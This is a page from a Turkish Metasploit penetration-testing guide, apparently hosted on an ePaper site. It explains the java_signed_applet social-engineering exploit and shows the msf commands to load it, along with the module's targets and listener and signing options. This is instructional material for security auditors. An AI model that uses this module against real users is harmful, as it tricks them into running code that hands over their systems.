Metasploit framework-Kullanim rehberi 0.8
Metasploit framework-Kullanim rehberi 0.8
Metasploit framework-Kullanim rehberi 0.8
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
<strong>Metasploit</strong> Framework ile Sistem Sızma Testleri Aralık 2012<br />
Bir diğer platform bağımsız web tarayıcı exploit'i ise imzalı Java applet'inin kullanıcıya<br />
çalıştırtılmasıdır. Çalıştırılan sahte web servisi ile kullanıcıya güvenilmeyen imzaya sahip<br />
bir Java applet'i sunulmakta ve çalıştırması istenmektedir. Eğer kullanıcı karşısına çıkan<br />
Java sanal makinesinin güvenilmeyen sertifika uyarısını okumaz ve kodu çalıştırırsa<br />
sistem ele geçirilebilmektedir. Bu noktada denetmen, web tarayıcılarının güvendiği bir<br />
sertifikaya sahip ise imzalama için SigningCert, SigningKey ve SigningKeyPass<br />
değişkenlerini tanımlayabilir.<br />
msf > use exploit/multi/browser/java_signed_applet<br />
msf exploit(java_signed_applet) > info<br />
Name: Java Signed Applet Social Engineering Code Execution<br />
Module: exploit/multi/browser/java_signed_applet<br />
Version: 15518<br />
Platform: Java, Windows, OSX, Linux, Solaris<br />
Privileged: No<br />
License: <strong>Metasploit</strong> Framework License (BSD)<br />
Rank: Excellent<br />
Provided by:<br />
natron <br />
Available targets:<br />
Id Name<br />
-- ----<br />
0 Generic (Java Payload)<br />
1 Windows x86 (Native Payload)<br />
2 Linux x86 (Native Payload)<br />
3 Mac OS X PPC (Native Payload)<br />
4 Mac OS X x86 (Native Payload)<br />
Basic options:<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
APPLETNAME SiteLoader yes The main applet's class name.<br />
CERTCN SiteLoader yes The CN= value for the certificate. Cannot<br />
contain ',' or '/'<br />
SRVHOST 0.0.0.0 yes The local host to listen on. This must be<br />
an address on the local machine or 0.0.0.0<br />
SRVPORT 8080 yes The local port to listen on.<br />
SSL false no Negotiate SSL for incoming connections<br />
SSLCert no Path to a custom SSL certificate (default<br />
is randomly generated)<br />
SSLVersion SSL3 no Specify the version of SSL that should be<br />
used (accepted: SSL2, SSL3, TLS1)<br />
SigningCert no Path to a signing certificate in PEM or<br />
PKCS12 (.pfx) format<br />
SigningKey no Path to a signing key in PEM format<br />
GamaSEC Bilgi Güvenliği Denetim ve Danışmanlık Servisleri Sayfa 132